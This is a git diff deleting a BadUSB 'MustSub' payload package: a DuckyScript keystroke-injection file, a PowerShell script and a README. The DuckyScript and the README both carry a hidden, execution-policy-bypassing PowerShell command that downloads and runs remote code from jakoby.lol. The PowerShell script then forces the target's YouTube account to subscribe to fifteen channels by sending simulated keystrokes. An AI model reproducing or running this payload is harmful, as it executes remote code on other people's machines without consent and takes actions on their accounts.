diff --git a/Payloads/Flip-MustSub/MustSub-Execute.txt b/Payloads/Flip-MustSub/MustSub-Execute.txt deleted file mode 100644 index b7d7325..0000000 --- a/Payloads/Flip-MustSub/MustSub-Execute.txt +++ /dev/null @@ -1,11 +0,0 @@ -REM Title: MustSub -REM Author: I am Jakoby -REM Description: This payload is used to get your target to subscribe to 15 of my favorite hacker youtube channels -REM Target: Windows 10, 11 -REM -------------------------------------------------------------------------------------- -REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. -REM -------------------------------------------------------------------------------------- -GUI r -DELAY 500 -STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex -ENTER diff --git a/Payloads/Flip-MustSub/MustSub.ps1 b/Payloads/Flip-MustSub/MustSub.ps1 deleted file mode 100644 index a027b56..0000000 --- a/Payloads/Flip-MustSub/MustSub.ps1 +++ /dev/null @@ -1,40 +0,0 @@ -$channels = @" -https://www.youtube.com/iamjakoby -https://www.youtube.com/c/CosmodiumCS -https://www.youtube.com/c/zSecurity -https://www.youtube.com/c/SystemExploited/featured -https://www.youtube.com/c/Lab401 -https://www.youtube.com/c/TheCyberMentor -https://www.youtube.com/c/JohnHammond010 -https://www.youtube.com/c/MalwareTechBlog -https://www.youtube.com/c/SecurityFWD -https://www.youtube.com/c/Nahamsec -https://www.youtube.com/c/jhaddix -https://www.youtube.com/c/NetworkChuck -https://www.youtube.com/c/DavidBombal -https://www.youtube.com/c/JimBrowning -https://www.youtube.com/user/TechInterpreterInc -"@ - -$URLs = $channels -split "`n" - -function subscribe { - -[CmdletBinding()] -param ( -[Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True)] -[string]$channel -) -Add-Type -AssemblyName System.Windows.Forms -$o=New-Object -ComObject WScript.Shell -$url = -join($channel,"?sub_confirmation=1") -Start-Process $url -Start-Sleep -Seconds 3 -[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2) -[System.Windows.Forms.SendKeys]::SendWait('{ENTER}') -Start-Sleep -Seconds 1 -[System.Windows.Forms.SendKeys]::SendWait('%{F4}') -Start-Sleep -Seconds 1 -} - -foreach ($channel in $URLs) {subscribe $channel} diff --git a/Payloads/Flip-MustSub/Readme.md b/Payloads/Flip-MustSub/Readme.md deleted file mode 100644 index 9e7720f..0000000 --- a/Payloads/Flip-MustSub/Readme.md +++ /dev/null @@ -1,121 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - - -

- - - -

- - -
- Table of Contents -
    -
  1. Description
  2. -
  3. Getting Started
  4. -
  5. Contributing
  6. -
  7. Version History
  8. -
  9. Contact
  10. -
  11. Acknowledgments
  12. -
-
- -# Must Sub - -A script used to get your target to subscribe to 15 of my favorite hacker YouTube channels. - -## Description - -This script will loop through an array of URLs. - -Each URL will be passed through the subscribe function. - -## Getting Started - -### Dependencies - -* An internet connection -* Windows 10,11 - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload -``` -powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

📱 My Socials 📱

-
- - - - - - - - -
- - C# - -
YouTube -
- - Python - -
Twitter -
- - Golang - -
Instagram -
- - Jsonnet - -
Discord -
- - Jsonnet - -
TikTok -
-
- -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) - -

(back to top)

- -

- Github Stats -